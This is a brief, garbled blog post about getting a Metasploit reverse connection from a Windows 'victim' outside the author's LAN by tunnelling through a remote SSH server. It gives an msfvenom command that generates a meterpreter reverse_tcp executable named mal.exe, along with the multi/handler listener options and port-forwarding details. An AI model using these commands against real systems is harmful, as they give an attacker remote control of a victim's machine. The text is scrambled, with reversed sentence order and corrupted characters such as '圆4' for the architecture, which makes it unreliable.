LHOST 192.168.0.102 yes The listen address Payload options (windows/圆4/meterpreter/reverse_tcp):ĮXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) Name Current Setting Required Description Msfvenom -p windows/圆4/meterpreter/reverse_tcp LHOST= LPORT=45679 -f exe -o mal.exeĪnd here is the multi/handler configuration under msf Now, here is the configuration of the malware generated by msfvenom Tested with netcat, and apache server, worked. The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
January 2023
Categories |